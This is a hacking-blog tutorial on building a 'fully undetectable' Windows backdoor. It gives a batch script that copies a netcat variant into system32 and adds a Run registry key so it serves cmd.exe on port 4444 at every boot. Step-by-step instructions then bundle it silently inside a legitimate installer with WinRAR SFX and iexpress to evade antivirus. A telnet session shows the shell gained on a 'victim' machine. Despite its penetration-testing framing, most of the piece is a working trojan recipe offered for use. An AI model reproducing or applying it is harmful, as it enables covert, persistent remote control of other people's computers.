How to Create a FUD Backdoor – Bypass An Antivirus

How to bypass an Anti-virus or how to create a FUD (fully undetectable) backdoor is not a new topic of discussion, the need to bypass an antivirus is very high because it is very helpful in the process of penetration testing and ethical hacking. You can bypass an antivirus by using the metasploit encoders and there are many other ways, in this tutorial I will show you how to make your ncat FUD and how to use the netcat as a backdoor.

As rcat is a good replica of Netcat and has an ability to bypass
most of the antivirus, then why not wrap it up with another file
(that must not a backdoor)?


To do this we use a simple technique:

  1. Create a batch file that will add your Netcat into the system
    folder and can edit the registry of the windows. Wait you don’t
    need to create it because I did it for you.


@echo off
copy rcat.exe %systemroot%system32rcat.exe
if errorlevel 0 goto regedit
goto error
:regedit
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v nc /d “%systemroot%system32rcat.exe -L -d -p 4444 -t -e cmd.exe”
if errorlevel 0 goto ip
:error
echo something wrong with the program.
goto end
:ip
echo write down the IP address from the table
ipconfig
:end
echo end.
nc -L -p 4444 -t


  • Open a notepad and than save it to name.bat
  • Download rcat and then copy rcat.exe into the same directory where name.bat exist
  • Now we use winrar to combine these two file, select both and then right click on add to archive

  • On the next window mark check on create SFX archive
  • Go to advance tab and click on SFX option
  • Fill out the options like at the figure below

  • Change the tab to modes and place mark of hide all
  • Almost done click OK than OK to create a file
  • New file must be appear at the same directory
  • We have combined it but now make it more compitable
  • Click on the start than run and type iexpress
  • iexpress wizard will start, click on next, then next (leave it as default), and then where it ask about package title write any title like test
  • On the next two window click leave as a default and then you need to add your files.
  • You
    need to add two files like I did (see figure below) one must a .exe
    file that we have made by using above method and the second file will be
    any setup file. iexpress combines them to make one.
 
  • On the next window there will be two options, on the install program select the simple setup and on the post install command select the backdoor.
  • On the next window place mark on hidden then click next
  • Enter the name of the final file and place mark on first option (see figure below )
  • On next window no restart and
    then don’t save, on the last create the package.
  • Your new file must be appear on the same directory and here is the report.
  • New file has an ability to bypass the most famous antivirus software and it has contained our back door.

Result

Let’s suppose our victim has executed the file. Now we can easily get the response via our command promote or terminal.
[email protected]:~# telnet 192.168.1.8
 
Trying 192.168.1.8…
 
telnet: Unable to connect to remote host: Connection refused
 
[email protected]:~# telnet 192.168.1.8 23
 
Trying 192.168.1.8…
 
telnet: Unable to connect to remote host: Connection refused

Why does it fail? Because our Netcat opened port number 4444. Look at the batch file code. Now check again.
[email protected]:~# telnet 192.168.1.8 4444
 
Trying 192.168.1.8…
 
Connected to 192.168.1.8.
 
Escape character is ‘^]’.
 
Microsoft Windows XP [Version 5.1.2600]
 
(C) Copyright 1985-2001 Microsoft Corp.
 
C:Documents and SettingsBlacksheep>
You can use nc instead of telnet.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

How to Install Kali Linux on VirtualBox [Windows Host] in 2020

Kali Linux is a Debian based Linux distribution, released on the 13th March 2013 as a complete rebuild of BackTrack Linux. It is one of...

Acunetix v13 Release Introduces Groundbreaking Innovations

The newest release of the Acunetix Web Vulnerability Scanner further improves performance and premieres best-of-breed technologies London, United Kingdom – February 5, 2019 – Acunetix,...

What is Ethical Hacking, how to be an Ethical Hacker

Hacking is the process of discovering vulnerabilities in a system and using these found vulnerabilities by gaining unauthorized access into the system to perform...

Basic steps to ensure security Online!

Security concerns are growing day by day due to the growing interconnectivity and technology. Drastic things can happen if you be a little careless...